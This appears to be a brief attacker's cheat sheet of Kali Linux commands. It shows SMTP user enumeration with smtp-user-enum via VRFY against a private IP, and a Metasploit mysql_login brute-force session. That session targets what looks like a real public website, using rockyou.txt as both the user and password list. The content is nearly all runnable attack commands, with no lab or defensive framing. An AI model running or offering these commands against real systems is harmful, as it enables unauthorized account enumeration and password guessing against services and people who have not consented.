- smtp-user-enum
kali > smtp-user-enum -M VRFY -U <userlist> -t <target IP>
kali > smtp-user-enum -M VRFY -U /usr/share/fern-wifi-cracker/extras/wordlists/common.txt -t 192.168.1.101
-
msfconsole
- brute-force login mysql server:
msf > use auxiliary/scanner/mysql/mysql_login
msf auxiliary(scanner/mysql/mysql_login) > show options
msf auxiliary(scanner/mysql/mysql_login) > set rhosts phimvnz.com
msf auxiliary(scanner/mysql/mysql_login) > set user_file /usr/share/wordlists/rockyou.txt
msf auxiliary(scanner/mysql/mysql_login) > set pass_file /usr/share/wordlists/rockyou.txt
msf auxiliary(scanner/mysql/mysql_login) > run